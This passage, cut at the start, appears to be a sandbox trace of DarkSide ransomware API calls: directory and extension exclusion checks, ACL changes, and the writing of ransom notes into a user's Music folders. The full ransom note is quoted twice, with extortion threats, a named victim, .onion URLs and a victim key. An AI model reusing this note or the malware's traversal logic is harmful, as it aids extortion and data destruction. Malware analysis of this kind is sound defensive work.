returned -7 [0150.347] wcslen (_String="exe") returned 0x3 [0150.347] _wcsicmp (_Str1="hlp", _Str2="lnk") returned -4 [0150.347] wcslen (_String="hlp") returned 0x3 [0150.347] _wcsicmp (_Str1="icl", _Str2="lnk") returned -3 [0150.347] wcslen (_String="icl") returned 0x3 [0150.347] _wcsicmp (_Str1="icns", _Str2="lnk") returned -3 [0150.347] wcslen (_String="icns") returned 0x4 [0150.347] _wcsicmp (_Str1="ico", _Str2="lnk") returned -3 [0150.347] wcslen (_String="ico") returned 0x3 [0150.347] _wcsicmp (_Str1="ics", _Str2="lnk") returned -3 [0150.347] wcslen (_String="ics") returned 0x3 [0150.347] _wcsicmp (_Str1="idx", _Str2="lnk") returned -3 [0150.347] wcslen (_String="idx") returned 0x3 [0150.347] _wcsicmp (_Str1="ldf", _Str2="lnk") returned -10 [0150.347] wcslen (_String="ldf") returned 0x3 [0150.347] _wcsicmp (_Str1="lnk", _Str2="lnk") returned 0 [0150.347] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.347] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0150.348] _wcsicmp (_Str1="backup", _Str2="Links") returned -10 [0150.348] wcslen (_String="backup") returned 0x6 [0150.348] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0150.348] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0150.348] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0150.348] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfa6e180, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfa6e180, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0150.348] _wcsicmp (_Str1="$recycle.bin", _Str2="Music") returned -73 [0150.348] wcslen (_String="$recycle.bin") returned 0xc [0150.348] _wcsicmp (_Str1="config.msi", _Str2="Music") returned -10 [0150.348] wcslen (_String="config.msi") returned 0xa [0150.348] _wcsicmp (_Str1="$windows.~bt", _Str2="Music") returned -73 [0150.348] wcslen (_String="$windows.~bt") returned 0xc [0150.348] _wcsicmp (_Str1="$windows.~ws", _Str2="Music") returned -73 [0150.348] wcslen (_String="$windows.~ws") returned 0xc [0150.348] _wcsicmp (_Str1="windows", _Str2="Music") returned 10 [0150.348] wcslen (_String="windows") returned 0x7 [0150.348] _wcsicmp (_Str1="appdata", _Str2="Music") returned -12 [0150.348] wcslen (_String="appdata") returned 0x7 [0150.349] _wcsicmp (_Str1="application data", _Str2="Music") returned -12 [0150.349] wcslen (_String="application data") returned 0x10 [0150.349] _wcsicmp (_Str1="boot", _Str2="Music") returned -11 [0150.349] wcslen (_String="boot") returned 0x4 [0150.349] _wcsicmp (_Str1="google", _Str2="Music") returned -6 [0150.349] wcslen (_String="google") returned 0x6 [0150.349] _wcsicmp (_Str1="mozilla", _Str2="Music") returned -6 [0150.349] wcslen (_String="mozilla") returned 0x7 [0150.349] _wcsicmp (_Str1="program files", _Str2="Music") returned 3 [0150.349] wcslen (_String="program files") returned 0xd [0150.349] _wcsicmp (_Str1="program files (x86)", _Str2="Music") returned 3 [0150.349] wcslen (_String="program files (x86)") returned 0x13 [0150.349] _wcsicmp (_Str1="programdata", _Str2="Music") returned 3 [0150.349] wcslen (_String="programdata") returned 0xb [0150.349] _wcsicmp (_Str1="system volume information", _Str2="Music") returned 6 [0150.349] wcslen (_String="system volume information") returned 0x19 [0150.349] _wcsicmp (_Str1="tor browser", _Str2="Music") returned 7 [0150.349] wcslen (_String="tor browser") returned 0xb [0150.349] _wcsicmp (_Str1="windows.old", _Str2="Music") returned 10 [0150.349] wcslen (_String="windows.old") returned 0xb [0150.349] _wcsicmp (_Str1="intel", _Str2="Music") returned -4 [0150.349] wcslen (_String="intel") returned 0x5 [0150.349] _wcsicmp (_Str1="msocache", _Str2="Music") returned -2 [0150.349] wcslen (_String="msocache") returned 0x8 [0150.349] _wcsicmp (_Str1="perflogs", _Str2="Music") returned 3 [0150.349] wcslen (_String="perflogs") returned 0x8 [0150.349] _wcsicmp (_Str1="x64dbg", _Str2="Music") returned 11 [0150.349] wcslen (_String="x64dbg") returned 0x6 [0150.349] _wcsicmp (_Str1="public", _Str2="Music") returned 3 [0150.349] wcslen (_String="public") returned 0x6 [0150.349] _wcsicmp (_Str1="all users", _Str2="Music") returned -12 [0150.349] wcslen (_String="all users") returned 0x9 [0150.349] _wcsicmp (_Str1="default", _Str2="Music") returned -9 [0150.349] wcslen (_String="default") returned 0x7 [0150.349] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0150.349] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0150.349] wcscpy (in: _Dest=0x4480094, _Source="Music" | out: _Dest="Music") returned="Music" [0150.350] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0150.350] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0150.350] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0150.350] GetNamedSecurityInfoW () returned 0x0 [0150.350] SetEntriesInAclW () returned 0x0 [0150.350] SetNamedSecurityInfoW () returned 0x0 [0150.423] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57dd8) returned 1 [0150.423] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.423] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 1 [0150.424] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.424] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.424] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.425] CloseHandle (hObject=0x678) returned 1 [0150.425] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0150.425] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="" [0150.425] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 0x28 [0150.425] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0150.426] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd84610a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd84610a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.426] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca383730, ftCreationTime.dwHighDateTime=0x1d5d93a, ftLastAccessTime.dwLowDateTime=0xf64f8130, ftLastAccessTime.dwHighDateTime=0x1d5dba5, ftLastWriteTime.dwLowDateTime=0xf64f8130, ftLastWriteTime.dwHighDateTime=0x1d5dba5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4ytVPICjNJN", cAlternateFileName="4YTVPI~1")) returned 1 [0150.426] _wcsicmp (_Str1="$recycle.bin", _Str2="4ytVPICjNJN") returned -16 [0150.426] wcslen (_String="$recycle.bin") returned 0xc [0150.426] _wcsicmp (_Str1="config.msi", _Str2="4ytVPICjNJN") returned 47 [0150.426] wcslen (_String="config.msi") returned 0xa [0150.426] _wcsicmp (_Str1="$windows.~bt", _Str2="4ytVPICjNJN") returned -16 [0150.426] wcslen (_String="$windows.~bt") returned 0xc [0150.426] _wcsicmp (_Str1="$windows.~ws", _Str2="4ytVPICjNJN") returned -16 [0150.426] wcslen (_String="$windows.~ws") returned 0xc [0150.426] _wcsicmp (_Str1="windows", _Str2="4ytVPICjNJN") returned 67 [0150.426] wcslen (_String="windows") returned 0x7 [0150.426] _wcsicmp (_Str1="appdata", _Str2="4ytVPICjNJN") returned 45 [0150.426] wcslen (_String="appdata") returned 0x7 [0150.426] _wcsicmp (_Str1="application data", _Str2="4ytVPICjNJN") returned 45 [0150.426] wcslen (_String="application data") returned 0x10 [0150.426] _wcsicmp (_Str1="boot", _Str2="4ytVPICjNJN") returned 46 [0150.427] wcslen (_String="boot") returned 0x4 [0150.427] _wcsicmp (_Str1="google", _Str2="4ytVPICjNJN") returned 51 [0150.427] wcslen (_String="google") returned 0x6 [0150.427] _wcsicmp (_Str1="mozilla", _Str2="4ytVPICjNJN") returned 57 [0150.427] wcslen (_String="mozilla") returned 0x7 [0150.427] _wcsicmp (_Str1="program files", _Str2="4ytVPICjNJN") returned 60 [0150.427] wcslen (_String="program files") returned 0xd [0150.427] _wcsicmp (_Str1="program files (x86)", _Str2="4ytVPICjNJN") returned 60 [0150.427] wcslen (_String="program files (x86)") returned 0x13 [0150.427] _wcsicmp (_Str1="programdata", _Str2="4ytVPICjNJN") returned 60 [0150.427] wcslen (_String="programdata") returned 0xb [0150.427] _wcsicmp (_Str1="system volume information", _Str2="4ytVPICjNJN") returned 63 [0150.427] wcslen (_String="system volume information") returned 0x19 [0150.427] _wcsicmp (_Str1="tor browser", _Str2="4ytVPICjNJN") returned 64 [0150.427] wcslen (_String="tor browser") returned 0xb [0150.427] _wcsicmp (_Str1="windows.old", _Str2="4ytVPICjNJN") returned 67 [0150.427] wcslen (_String="windows.old") returned 0xb [0150.427] _wcsicmp (_Str1="intel", _Str2="4ytVPICjNJN") returned 53 [0150.427] wcslen (_String="intel") returned 0x5 [0150.427] _wcsicmp (_Str1="msocache", _Str2="4ytVPICjNJN") returned 57 [0150.427] wcslen (_String="msocache") returned 0x8 [0150.427] _wcsicmp (_Str1="perflogs", _Str2="4ytVPICjNJN") returned 60 [0150.427] wcslen (_String="perflogs") returned 0x8 [0150.427] _wcsicmp (_Str1="x64dbg", _Str2="4ytVPICjNJN") returned 68 [0150.427] wcslen (_String="x64dbg") returned 0x6 [0150.427] _wcsicmp (_Str1="public", _Str2="4ytVPICjNJN") returned 60 [0150.427] wcslen (_String="public") returned 0x6 [0150.427] _wcsicmp (_Str1="all users", _Str2="4ytVPICjNJN") returned 45 [0150.427] wcslen (_String="all users") returned 0x9 [0150.427] _wcsicmp (_Str1="default", _Str2="4ytVPICjNJN") returned 48 [0150.427] wcslen (_String="default") returned 0x7 [0150.427] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*" [0150.427] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 0x29 [0150.427] wcscpy (in: _Dest=0x44b00b8, _Source="4ytVPICjNJN" | out: _Dest="4ytVPICjNJN") returned="4ytVPICjNJN" [0150.427] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0150.428] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0150.429] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" [0150.429] GetNamedSecurityInfoW () returned 0x0 [0150.430] SetEntriesInAclW () returned 0x0 [0150.430] SetNamedSecurityInfoW () returned 0x0 [0150.445] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57e78) returned 1 [0150.445] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0150.445] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn")) returned 1 [0150.445] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0150.445] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0150.446] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0150.446] CloseHandle (hObject=0x678) returned 1 [0150.447] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0150.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn")) returned 0x10 [0150.448] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\") returned="" [0150.448] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\") returned 0x34 [0150.448] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0150.448] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca383730, ftCreationTime.dwHighDateTime=0x1d5d93a, ftLastAccessTime.dwLowDateTime=0xd8487200, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8487200, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.449] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x815fb30, ftCreationTime.dwHighDateTime=0x1d5dc8f, ftLastAccessTime.dwLowDateTime=0xdad4d30, ftLastAccessTime.dwHighDateTime=0x1d5df1b, ftLastWriteTime.dwLowDateTime=0xdad4d30, ftLastWriteTime.dwHighDateTime=0x1d5df1b, nFileSizeHigh=0x0, nFileSizeLow=0x6b32, dwReserved0=0x0, dwReserved1=0x0, cFileName="9OXK2ad.mp3", cAlternateFileName="")) returned 1 [0150.449] _wcsicmp (_Str1="9OXK2ad.mp3", _Str2="README.c06622a1.TXT") returned -57 [0150.449] wcsstr (_Str="9OXK2ad.mp3", _SubStr="README") returned 0x0 [0150.449] _wcsicmp (_Str1="autorun.inf", _Str2="9OXK2ad.mp3") returned 40 [0150.449] wcslen (_String="autorun.inf") returned 0xb [0150.449] _wcsicmp (_Str1="boot.ini", _Str2="9OXK2ad.mp3") returned 41 [0150.449] wcslen (_String="boot.ini") returned 0x8 [0150.449] _wcsicmp (_Str1="bootfont.bin", _Str2="9OXK2ad.mp3") returned 41 [0150.449] wcslen (_String="bootfont.bin") returned 0xc [0150.449] _wcsicmp (_Str1="bootsect.bak", _Str2="9OXK2ad.mp3") returned 41 [0150.449] wcslen (_String="bootsect.bak") returned 0xc [0150.449] _wcsicmp (_Str1="desktop.ini", _Str2="9OXK2ad.mp3") returned 43 [0150.449] wcslen (_String="desktop.ini") returned 0xb [0150.449] _wcsicmp (_Str1="iconcache.db", _Str2="9OXK2ad.mp3") returned 48 [0150.449] wcslen (_String="iconcache.db") returned 0xc [0150.449] _wcsicmp (_Str1="ntldr", _Str2="9OXK2ad.mp3") returned 53 [0150.450] wcslen (_String="ntldr") returned 0x5 [0150.450] _wcsicmp (_Str1="ntuser.dat", _Str2="9OXK2ad.mp3") returned 53 [0150.450] wcslen (_String="ntuser.dat") returned 0xa [0150.450] _wcsicmp (_Str1="ntuser.dat.log", _Str2="9OXK2ad.mp3") returned 53 [0150.450] wcslen (_String="ntuser.dat.log") returned 0xe [0150.450] _wcsicmp (_Str1="ntuser.ini", _Str2="9OXK2ad.mp3") returned 53 [0150.450] wcslen (_String="ntuser.ini") returned 0xa [0150.450] _wcsicmp (_Str1="thumbs.db", _Str2="9OXK2ad.mp3") returned 59 [0150.450] wcslen (_String="thumbs.db") returned 0x9 [0150.450] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0150.450] wcslen (_String="386") returned 0x3 [0150.450] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0150.450] wcslen (_String="adv") returned 0x3 [0150.450] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0150.450] wcslen (_String="ani") returned 0x3 [0150.450] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0150.450] wcslen (_String="bat") returned 0x3 [0150.450] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0150.450] wcslen (_String="bin") returned 0x3 [0150.450] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0150.450] wcslen (_String="cab") returned 0x3 [0150.450] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0150.450] wcslen (_String="cmd") returned 0x3 [0150.450] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0150.450] wcslen (_String="com") returned 0x3 [0150.450] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0150.450] wcslen (_String="cpl") returned 0x3 [0150.450] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0150.450] wcslen (_String="cur") returned 0x3 [0150.450] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0150.450] wcslen (_String="deskthemepack") returned 0xd [0150.450] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0150.450] wcslen (_String="diagcab") returned 0x7 [0150.450] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0150.450] wcslen (_String="diagcfg") returned 0x7 [0150.450] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0150.450] wcslen (_String="diagpkg") returned 0x7 [0150.450] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0150.451] wcslen (_String="dll") returned 0x3 [0150.451] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0150.451] wcslen (_String="drv") returned 0x3 [0150.451] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0150.451] wcslen (_String="exe") returned 0x3 [0150.451] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0150.451] wcslen (_String="hlp") returned 0x3 [0150.451] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0150.451] wcslen (_String="icl") returned 0x3 [0150.451] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0150.451] wcslen (_String="icns") returned 0x4 [0150.451] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0150.451] wcslen (_String="ico") returned 0x3 [0150.451] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0150.451] wcslen (_String="ics") returned 0x3 [0150.451] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0150.451] wcslen (_String="idx") returned 0x3 [0150.451] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0150.451] wcslen (_String="ldf") returned 0x3 [0150.451] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0150.451] wcslen (_String="lnk") returned 0x3 [0150.451] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0150.451] wcslen (_String="mod") returned 0x3 [0150.451] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0150.451] wcslen (_String="mpa") returned 0x3 